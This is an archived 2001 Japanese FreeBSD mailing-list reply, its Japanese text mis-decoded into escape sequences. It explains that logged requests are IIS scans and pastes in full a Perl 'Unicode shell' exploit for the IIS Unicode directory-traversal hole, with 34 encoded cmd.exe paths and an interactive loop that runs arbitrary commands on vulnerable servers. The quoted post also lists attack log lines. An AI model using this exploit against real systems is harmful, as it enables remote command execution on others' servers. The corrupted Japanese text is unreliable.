From owner-FreeBSD-users-jp@jp.freebsd.org  Wed Sep 19 04:13:00 2001
Received: (from daemon@localhost)
	by castle.jp.freebsd.org (8.9.3+3.2W/8.7.3) id EAA12408;
	Wed, 19 Sep 2001 04:13:00 +0900 (JST)
	(envelope-from owner-FreeBSD-users-jp@jp.FreeBSD.org)
Received: from mail.musuka.com (zaqd3789b2a.zaq.ne.jp [211.120.155.42])
	by castle.jp.freebsd.org (8.9.3+3.2W/8.7.3) with ESMTP id EAA12403
	for <FreeBSD-users-jp@jp.freebsd.org>; Wed, 19 Sep 2001 04:12:59 +0900 (JST)
	(envelope-from admin@musuka.com)
Received: from noren (noren [192.168.1.4])
	by mail.musuka.com (8.11.4+3.4W/8.11.4) with ESMTP id f8IJD0l01196
	for <FreeBSD-users-jp@jp.freebsd.org>; Wed, 19 Sep 2001 04:13:00 +0900 (JST)
Date: Wed, 19 Sep 2001 04:12:58 +0900
From: Matsumura  <matsumura@musuka.com>
To: FreeBSD-users-jp@jp.freebsd.org
In-Reply-To: <20010918134410.7415@mail.ca2.so-net.ne.jp>
References: <20010918134410.7415@mail.ca2.so-net.ne.jp>
Message-Id: <20010919041107.BA90.MATSUMURA@musuka.com>
MIME-Version: 1.0
Content-Type: text/plain; charset="ISO-2022-JP"
Content-Transfer-Encoding: 7bit
X-Mailer: Becky! ver. 2.00.03
Reply-To: FreeBSD-users-jp@jp.freebsd.org
Precedence: list
X-Distribute: distribute version 2.1 (Alpha) patchlevel 24e+010328
X-Sequence: FreeBSD-users-jp 64362
Subject: [FreeBSD-users-jp 64362] Re: =?ISO-2022-JP?B?GyRCPzc8bxsoQg==?=
 =?ISO-2022-JP?B?GyRCISkbKEI=?= 
Errors-To: owner-FreeBSD-users-jp@jp.freebsd.org
Sender: owner-FreeBSD-users-jp@jp.freebsd.org
X-Originator: matsumura@musuka.com

$B$O$8$a$^$7$F!">>B<$H$$$$$^$9!#(B
$B$3$l$O!!(BCodeRed$B$H$+$H$OA4A34X78$J$/$F!"$?$@!!(BIIS$B$r;H$C$F$$$k$+$I$&$+$N%9(B
$B%-%c%s%W%m%0%i%`$G%9%-%c%s$5$l$F$$$k$@$1$@$H$*$b$$$^$9!#(B
$B;d$b$I$3$+$G=&$C$F$-$?(B($B<:Ni!&!&!&(B)$B%9%-%c%s$N$?$a$N(BPerl$B%9%/%j%W%H$,<j85$K$"(B
$B$j$^$9$N$G!"E=$jIU$1$F$*$-$^$9!#(B
$B<B9T$5$l$?%5!<%P$N%"%/%;%9%m%0$K$O3N$+$K$h$/;w$?$b$N$,;D$j$^$9!#(B
$B$3$s$J%9%/%j%W%H$N<{MW$,$"$k$/$i$$!"(BIIS$B$r;H$C$F$$$k%5!<%P$O3J9%$NI8E*(B($B2?$N(B??)
$B$K$J$k$s$G$7$g$&$M!#(B

---------$B$3$3$+$i(B------------------------------------------------------------
#!/usr/bin/perl -w

use strict;
use IO::Socket;

print "\nUnicode shell Version 2.0J\nWrited by Lion. Slightly modified by Vladimir.\nHonker SUX!! Honker Must DIE!!\n";

#$B$o$+$k$H$O;W$&$1$I!"(B"Writed"$B$C$F$N$O86J8$N$^$^$M!#(B

# $B%"hC%=(B
my $host;               # $B%9%-%c%s$9$k%[%9%H(B
my $port;               # $B%5!<%P!<$N%]!<%H(B
my $command;            # $B<B9T$9$k%3%^%s%I(B
my $url;                # $B;HMQ$9$k(BURL$B%3!<%IJ}K!(B
my @results;            # $B%[%9%H$+$i$NH?1~(B
my $probe;              # $B=PNO$rI=<($9$k$+$I$&$+(B
my @U;                  # $B%3!<%I$NJ}<0(B

# $B%9%-%c%s$9$k9`L\$r$3$3$KDI2C$9$k$3$H$,$G$-$k(B

# $U[0] always used for custom URL.
$U[1] = "/scripts/..%252f../winnt/system32/cmd.exe?/c+";
$U[2] = "/scripts/..%255c../winnt/system32/cmd.exe?/c+";
$U[3] = "/scripts/..%%35c../winnt/system32/cmd.exe?/c+";
$U[4] = "/scripts/..%%35%63../winnt/system32/cmd.exe?/c+";
$U[5] = "/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+";
$U[6] = "/scripts/..%c0%af../winnt/system32/cmd.exe?/c+";
$U[7] = "/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+";
$U[8] = "/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+";
$U[9] = "/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+";
$U[10] = "/scripts/..%c0%qf../winnt/system32/cmd.exe?/c+";
$U[11] = "/scripts/..%c1%8s../winnt/system32/cmd.exe?/c+";
$U[12] = "/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+";
$U[13] = "/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+";
$U[14] = "/scripts/..%c1%af../winnt/system32/cmd.exe?/c+";
$U[15] = "/scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+";
$U[16] = "/scripts/..%f0%80%80%af../winnt/system32/cmd.exe?/c+";
$U[17] = "/scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+";
$U[18] = "/scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+";
$U[19] = "/scripts/msadc/..%252f../..%252f../..%252f../winnt/system32/cmd.exe?/c+";
$U[20] = "/scripts/msadc/..%e0%80%af../..%e0%80%af../..%e0%80%af../winnt/system32/cmd.exe?/c+";
$U[21] = "/scripts/msadc/..%e0%80%af..%e0%80%af..%e0%80%af../winnt/system32/cmd.exe?/c+";
$U[22] = "/scripts/msadc/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+";
$U[23] = "/msadc/..%252f../..%252f../..%252f../winnt/system32/cmd.exe?/c+";
$U[24] = "/msadc/..\%e0\%80\%af../..\%e0\%80\%af../..\%e0\%80\%af../winnt/system32/cmd.exe?/c+";
$U[25] = "/msadc/..%e0%80%af..%e0%80%af..%e0%80%af../winnt/system32/cmd.exe?/c+";
$U[26] = "/msadc/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+";
$U[27] = "/_vti_bin/..%252f../..%252f../..%252f../winnt/system32/cmd.exe?/c+";
$U[28] = "/_vti_bin/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+";
$U[29] = "/_vti_bin/..%e0%80%af../..%e0%80%af../..%e0%80%af../winnt/system32/cmd.exe?/c+";
$U[30] = "/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+";
$U[31] = "/_vti_bin/msadc/..%252f../..%252f../..%252f../..%252f../..%252f../..%252f../winnt/system32/cmd.exe?/c+";
$U[32] = "/_vti_bin/msadc/..%e0%80%af../..%e0%80%af../..%e0%80%af../..%e0%80%af../..%e0%80%af../..%e0%80%af../winnt/system32/cmd.exe?/c+";
$U[33] = "/_vti_bin/msadc/..%e0%80%af..%e0%80%af..%e0%80%af..%e0%80%af..%e0%80%af..%e0%80%af../winnt/system32/cmd.exe?/c+";
$U[34] = "/_vti_bin/msadc/..%c1%1c../..%c1%1c../..%c1%1c../..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+";


# $B%5%V%k!<%A%s3+;O(B
&intro;
&scan;
&choose;
&command;
&exit;

sub intro {
&help;
&host;
&server;
sleep 3;
};

# $B%[%9%H$N%5%V%k!<%A%s(B
sub host {
print "\n$B%9%-%c%s$9$kL\I8(B: ";
$host=<STDIN>;
chomp $host;
if ($host eq ""){$host="localhost"};
print "\n$BL\I8$N%]!<%H(B($B%G%U%)%k%H$O(B80) : ";
$port=<STDIN>;
chomp $port;
if ($port =~/\D/ ){$port="80"};
if ($port eq "" ) {$port = "80"};
};

# IIS$B%5!<%P!<$rH=JL$9$k%5%V%k!<%A%s(B
sub server {
print "\nIIS$B$NH?1~$,F@$i$l$k$+;n$7$F$_$k(B...";
$probe = "string";
my $output;
my $webserver = "something";
&connect;
foreach $output (@results){
        if ($output =~/IIS/){ $webserver = "iis" };
        };
if ($webserver ne "iis"){
print "\a\a\n\n$B7Y9p(B:$B$3$NJ}<0$N%3!<%I$O;HMQ$G$-$^$;$s(B";
print "\n$B$3$N%7%9%F%`$O(BIIS$B%5!<%S%9$r;HMQ$7$F$$$^$;$s(B";
print "\nUnicod$B%;%-%e%j%F%#%[!<%k$OB8:_$7$^$;$s(B";
print "\n\n\n$BB3$1$^$9$+(B... [Y/N]";
my $choice = <STDIN>;
chomp $choice;
if ($choice =~/N/i) {&exit};
            }else{
print "\n\n$B$d$C$?$<!*$3$$$D$O(BIIS$B%5!<%P!<$@!*!*(B\n";
        };
};

# $B%9%-%c%s$N%5%V%k!<%A%s(B
sub scan {
my $status = "not_vulnerable";
print "\n$B8=:_%&%'%V%5!<%P!<$r%9%-%c%s$7$F$$$^$9!'(B $host $B%]!<%H(B: $port ...";
my $loop;
my $output;
my $flag;
$command="dir";
for ($loop=1; $loop < @U; $loop++) {
$flag = "0";
$url = $U[$loop];
$probe = "scan";
&connect;
foreach $output (@results){
if ($output =~ /Directory/) {
                              $flag = "1";
                              $status = "vulnerable";
                              };
        };

if ($flag eq "0") {
print "\n$host$B%3!<%IJ}<0(B$loop$B$O<:GT(B:-(";
}else{
print "\a\a\a\n$host$B%3!<%IJ}<0(B$loop$B@.8y(B------Good!!!:-)";
     };
};
if ($status eq "not_vulnerable"){
                                print "\n\n$B$4$a$s$J$5$$!#(B $host$B$K$O(BUNICODE$B%;%-%e%j%F%#%[!<%k$,8+$D$+$j$^$;$s$G$7$?!#(B";
                                &exit;
                                };
}; # end scan subroutine.

# $B%3!<%I(BURL$B$rA*Br$9$k%5%V%k!<%A%s(B
sub choose {
print "\n\n$B%3!<%IJ}<0$rA*$s$G$/$@$5$$(B [ $B$=$NB>$N>l9g$O(B0$B$rF~NO(B ]: ";
my $choice=<STDIN>;
chomp $choice;
if ($choice > @U){ &choose };
if ($choice =~/\D/g ){ &choose };
if ($choice == 0){ &other };
$url = $U[$choice];
print "HTTP://$host$url";
};

# $B$=$NB>$N%3!<%I(BURL$BA*Br%5%V%k!<%A%s(B

sub other {
print "\nURL [$B$=$NB>$N%3%^%s%I(B]$BNc(B HTTP://$host\/scripts\/cmd.exe?\/+";
print "\nHTTP://$host";
my $other = <STDIN>;
chomp $other;
$U[0] = $other;
};

# $B%3%^%s%I$N%5%V%k!<%A%s(B
sub command {
while ($command !~/quit/i) {
print "\n==============================\n\
$B%X%k%W(B\n$B%9%-%c%sCf;_!'(B            quit\n$B%3!<%I(BURL$B:F;n9T!'(B             url\n";
print "$B%9%-%c%s:F;n9T!'(B            scan\n$B$=$NB>$r%9%-%c%s!'(B             host\n$B%X%k%W$rD4$Y$k!'(B            help\n";
print "==============================\n\n$BL\I8>e$G%3%^%s%I$r<B9T$9$k(B\n$B<B9T$9$k%3%^%s%I$r<!$N$h$&$KF~NO$9$k!'(Bdir C: \n$B<B9T$9$k%3%^%s%I!'(B";
$command = <STDIN>;
chomp $command;
if ($command =~/quit/i) { &exit };
if ($command =~/url/i) { &choose };
if ($command =~/scan/i) { &scan };
if ($command =~/host/i) { &host;&server;&scan;&choose };
if ($command =~/help/i) { &help };
$command =~ s/\s/+/g;
print "HTTP://$host$url$command";
$probe = "command";
if ($command !~/quit|url|scan|host|help/) {&connect};
};
&exit;
};

# $B@\B3%5%V%k!<%A%s(B
sub connect {
my $connection = IO::Socket::INET->new (
                                Proto => "tcp",
                                PeerAddr => "$host",
                                PeerPort => "$port",
                                ) or die "\n $B$9$_$^$;$s!#%[%9%H(B$host$B$N%]!<%H(B$port$B$K@\B3$G$-$^$;$s$G$7$?(B\n";
$connection -> autoflush(1);
if ($probe =~/command|scan/){
print $connection "GET $url$command HTTP/1.0\r\n\r\n";
}elsif ($probe =~/string/) {
print $connection "HEAD / HTTP/1.0\r\n\r\n";
};

while ( <$connection> ) {
                        @results = <$connection>;
                         };
close $connection;
if ($probe eq "command"){ &output };
if ($probe eq "string"){ &output };
};

# $BI=<(%5%V%k!<%A%s(B
sub output{
print "\n$B%[%9%H%^%7%s$NI=<(!'(B $host. \n\n";
my $display;
foreach $display (@results){
                            print "$display";
                            sleep 1;
                                };
};

# $B=*N;%5%V%k!<%A%s(B
sub exit{
print "\n\n$B$4MxMQ$"$j$,$H$&$4$6$$$^$7$?!#(B:-)";
print "\n\n";
exit;
};


sub help {
print "Mail bug to infovlad\@263.net\n";
};


----$B$3$3$^$G(B-----------------------------------------------------------------

> $B!!$_$>$O$?$G$9!#(B
> 
> $B!!(Bhttpd $B$N%m%0$r8+$F$$$?$i!"0J2<$N$h$&$J0lO"$N%"%?%C%/$rLTNu$K<u$1$F(B
> $B$$$k$N$G$9$,!&!&!&(B root.exe $B$r;H$C$F$$$k$"$?$j!"(Bcode red $B4XO"$N?7<o(B
> $B$+$J!A$H;W$C$F$$$k$N$G$9$,!&!&!&(B202.*.*.* $B$N$+$J$j$$$m$$$m$J$H$3$m$+(B
> $B$i$d$C$F$-$F$$$^$9!#967b85$O$I$&$d$i(B Win NT $B$N$h$&$G$9!JA4ItD4$Y$?$o(B
> $B$1$G$O$"$j$^$;$s$,!K!#(B
> 
> ----------------------------------------------------------------------
> "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 285 "-" "-"
> "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 283 "-" "-"
> "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 293 "-" "-"
> "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 293 "-" "-"
> "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 307 "-" "-"
> "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 324 "-" "-"
> "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 324 "-" "-"
> "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 340 "-" "-"
> "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306 "-" "-"
> "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306 "-" "-"
> "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306 "-" "-"
> "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306 "-" "-"
> "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 290 "-" "-"
> "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 290 "-" "-"
> "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 307 "-" "-"
> "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 307 "-" "-"
> ----------------------------------------------------------------------
> 
> $B!!$J$K$+>pJs$"$j$^$7$?$i$*4j$$$7$^$9!#(B
> 



_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/
        Matsumura$B!!!w!!%`%9%+(B.com
_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/

